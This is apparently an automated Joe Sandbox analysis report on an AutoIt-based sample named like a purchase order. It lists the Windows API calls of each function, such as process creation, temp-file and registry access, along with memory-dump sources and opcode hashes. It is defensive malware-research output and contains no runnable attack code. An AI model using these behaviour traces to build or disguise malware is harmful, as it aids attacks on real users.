                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                                                      • API String ID: 1586453840-614718249
                                                                                                                                                                                                      • Opcode ID: 6e2642f92ac6b630ee04a3de7f9ccbad1b1158d06de569f2c8570250353f6bad
                                                                                                                                                                                                      • Instruction ID: 24367ca1c3048aa5880316b58277e600b20755b5d821188449d38961baa88e0d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e2642f92ac6b630ee04a3de7f9ccbad1b1158d06de569f2c8570250353f6bad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6116071A01109BEEB04ABA4CD86EFF7BACEF45348F10446AB506E7191EB745E01DB58

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2244 4036b8-403728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004036E6
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403707
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 0040371B
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 00403724
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                                      • Opcode ID: 5d8e0124634df2f6e3b1d57e41c7542da14dc5e0961a2e3f2bc33fd230573aeb
                                                                                                                                                                                                      • Instruction ID: 4d08d86da7aa94d300ca7f7225cc14ad318fbe6330d37f8c56b478b09d34b1b0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d8e0124634df2f6e3b1d57e41c7542da14dc5e0961a2e3f2bc33fd230573aeb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57F0FE719402D07AEB715767AC48E773E7DEBC7F20F00403FBA04A25B1C66508A5DAB8

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00405374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C1148,?,004061FF,?,00000000,00000001,00000000), ref: 00405392
                                                                                                                                                                                                        • Part of subcall function 004049FB: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00404A1D
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00472D80
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00472DB5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscat$FileModuleNameOpen
                                                                                                                                                                                                      • String ID: 8!L$\$\Include\
                                                                                                                                                                                                      • API String ID: 3592542968-1316215114
                                                                                                                                                                                                      • Opcode ID: ed96d8d4dc5fc6f79d675eabc9ed72eb954c5a6136f35b35f00c8d5d0e0da28e
                                                                                                                                                                                                      • Instruction ID: 69193c1904a342b4ff2347d59ce207587477678b7e20525fd4ba8b54dc9425ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed96d8d4dc5fc6f79d675eabc9ed72eb954c5a6136f35b35f00c8d5d0e0da28e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED514CB54043409FC754EF56EA818AAB7F4BA49304B48453FF649A32A1DFF89608CB5E
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 004041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004039FE,?,00000001), ref: 004041DB
                                                                                                                                                                                                      • _free.LIBCMT ref: 004736B7
                                                                                                                                                                                                      • _free.LIBCMT ref: 004736FE
                                                                                                                                                                                                        • Part of subcall function 0040C833: __wsplitpath.LIBCMT ref: 0040C93E
                                                                                                                                                                                                        • Part of subcall function 0040C833: _wcscpy.LIBCMT ref: 0040C953
                                                                                                                                                                                                        • Part of subcall function 0040C833: _wcscat.LIBCMT ref: 0040C968
                                                                                                                                                                                                        • Part of subcall function 0040C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0040C978
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                                                                      • API String ID: 805182592-1757145024
                                                                                                                                                                                                      • Opcode ID: 3f6e2781b3b70428434a1c9947f3fbeb67486eeecc21cf739d6f0ac104d136f1
                                                                                                                                                                                                      • Instruction ID: a5069b7475330fe088817bec80de3aee8e84fa7b19bb18b6e651e427e71290f0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6e2781b3b70428434a1c9947f3fbeb67486eeecc21cf739d6f0ac104d136f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91916071910219AFCF14EFA5CC919EEB7B4BF14314F10842FF415AB291DB38AA45DB98
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00C13278: Sleep.KERNEL32(000001F4), ref: 00C13289
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C134CF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFileSleep
                                                                                                                                                                                                      • String ID: IZDGWEHAGJZJQ1EEEP4L9
                                                                                                                                                                                                      • API String ID: 2694422964-2185050280
                                                                                                                                                                                                      • Opcode ID: a3c6485b9c9b50a525f5939a36d59b6111498a6ecad70bdca42a349d86d3063e
                                                                                                                                                                                                      • Instruction ID: 7aaf8f9e28663835785354e8e03f50cef95eb214bbe243960e9425e208639538
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3c6485b9c9b50a525f5939a36d59b6111498a6ecad70bdca42a349d86d3063e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9619070D04288DBEF11DBA4C855BEEBBB5AF19304F104598E208BB2C1D6B91F85DB66
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00473725
                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 0047376F
                                                                                                                                                                                                        • Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F
                                                                                                                                                                                                        • Part of subcall function 004040A7: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004040C6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                                                                      • String ID: X$t3K
                                                                                                                                                                                                      • API String ID: 3777226403-2811000538
                                                                                                                                                                                                      • Opcode ID: b93b0c1c5738115443a6aa44457fd713ed33a969696249c1967a6bebbd69b3da
                                                                                                                                                                                                      • Instruction ID: 9ad05c4a51ad5a7aed7e064f7d04d0a32a4adfcb21fa2545d4e7afce16479d8e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b93b0c1c5738115443a6aa44457fd713ed33a969696249c1967a6bebbd69b3da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C62196B1A101989BCB01DF95D845BDE7BF89F89305F00806FE505BB281DBBC5A898F69
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getstream.LIBCMT ref: 004234FE
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00423539
                                                                                                                                                                                                      • __wopenfile.LIBCMT ref: 00423549
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                                                                      • String ID: <G
                                                                                                                                                                                                      • API String ID: 1820251861-2138716496
                                                                                                                                                                                                      • Opcode ID: e12d3699157ed522373a9c6598b4b5b430320c1e0cdd8312ea3d440cb485dafa
                                                                                                                                                                                                      • Instruction ID: 89deda876913a1a8087184d99beb7911a355133d9146999c29091959b336447a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e12d3699157ed522373a9c6598b4b5b430320c1e0cdd8312ea3d440cb485dafa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A113D70B00235ABDB11BF73BC4266F36B4AF05354B95895BE414C7281EB3CCA419779
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0041D28B,SwapMouseButtons,00000004,?), ref: 0041D2BC
                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0041D28B,SwapMouseButtons,00000004,?,?,?,?,0041C865), ref: 0041D2DD
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,0041D28B,SwapMouseButtons,00000004,?,?,?,?,0041C865), ref: 0041D2FF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                                      • Opcode ID: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
                                                                                                                                                                                                      • Instruction ID: 0cd1190555930828b12ec140491f6cbda27ebd5e95af48670a4612518318c08c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC117CB5A11208BFDB118F64CC84EEF7BB8EF05744F10486AE801D7250D735AE819B68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00404517: _fseek.LIBCMT ref: 0040452F
                                                                                                                                                                                                        • Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C65D
                                                                                                                                                                                                        • Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C670
                                                                                                                                                                                                      • _free.LIBCMT ref: 0044C4DD
                                                                                                                                                                                                      • _free.LIBCMT ref: 0044C4E4
                                                                                                                                                                                                      • _free.LIBCMT ref: 0044C54F
                                                                                                                                                                                                        • Part of subcall function 00421C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00427A85), ref: 00421CB1
                                                                                                                                                                                                        • Part of subcall function 00421C9D: GetLastError.KERNEL32(00000000,?,00427A85), ref: 00421CC3
                                                                                                                                                                                                      • _free.LIBCMT ref: 0044C557
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1552873950-0
                                                                                                                                                                                                      • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                                                                                                      • Instruction ID: 674951708a286eb07b9171a8a69b16656f8ff281423f2ed36709ed89db711628
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E515FF5A04218AFDB149F65DC81AADBBB9EF48304F1000AEB219A3291DB755A80CF5D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32 ref: 00ABB2BA
                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00ABB2E0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$PointerWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 539440098-0
                                                                                                                                                                                                      • Opcode ID: ca23d33e3a35d6ef056f07b59244ea535e45da3e15897ebf72c84674a1887985
                                                                                                                                                                                                      • Instruction ID: 93643cced9f91080fec79f46c848d5cb74045fbf82b49f2cd43a27b4dbbd6f94
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca23d33e3a35d6ef056f07b59244ea535e45da3e15897ebf72c84674a1887985
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D31817042C380AED7119B6988157FFBFE8AB92714F48864DE4D88A693D3F488089773
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041EBB2
                                                                                                                                                                                                        • Part of subcall function 004051AF: _memset.LIBCMT ref: 0040522F
                                                                                                                                                                                                        • Part of subcall function 004051AF: _wcscpy.LIBCMT ref: 00405283
                                                                                                                                                                                                        • Part of subcall function 004051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00405293
                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 0041EC07
                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0041EC16
                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00473C88
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1378193009-0
                                                                                                                                                                                                      • Opcode ID: df4f371beef39f263f04c1f7b813fdb3b3131aef762958de6741ae884a2b81f1
                                                                                                                                                                                                      • Instruction ID: b49518ba9000ce9ca09009b9798321fdbb3bf5267274904d3eb6e3e3661bd638
                                                                                                                                                                                                      • Opcode Fuzzy Hash: df4f371beef39f263f04c1f7b813fdb3b3131aef762958de6741ae884a2b81f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3521DD759057949FE7339B248C55FE7BFEC9B01308F04045ED68E66282D3781A858B5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000), ref: 00C1200D
                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00C1202C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CreateExit
                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                      • API String ID: 126409537-2746444292
                                                                                                                                                                                                      • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                                                                                                                                                                                      • Instruction ID: 068121be79b00b8837a5165e919ac0997354da939e891e7dc16e44e105740d3f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68F04F7550024CABDB20EFE0CC49FEE777DBF08701F408508FB0A9A184DA7496489B61
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0044C72F
                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0044C746
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                                                      • String ID: aut
                                                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                                                      • Opcode ID: 3d2e6316c8f3a47ad6dc190deda9ae84468cfd82ede16fcca1fefbdffebd8a43
                                                                                                                                                                                                      • Instruction ID: 208516855a03f89cd35dcfacd4225edbf1aaece69b415c0056d3480ee9c56843
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d2e6316c8f3a47ad6dc190deda9ae84468cfd82ede16fcca1fefbdffebd8a43
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81D05E7190030EBBDB10AB94DC0EFCA776C9700704F0005A17650A50F1DAB4E6998B69
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
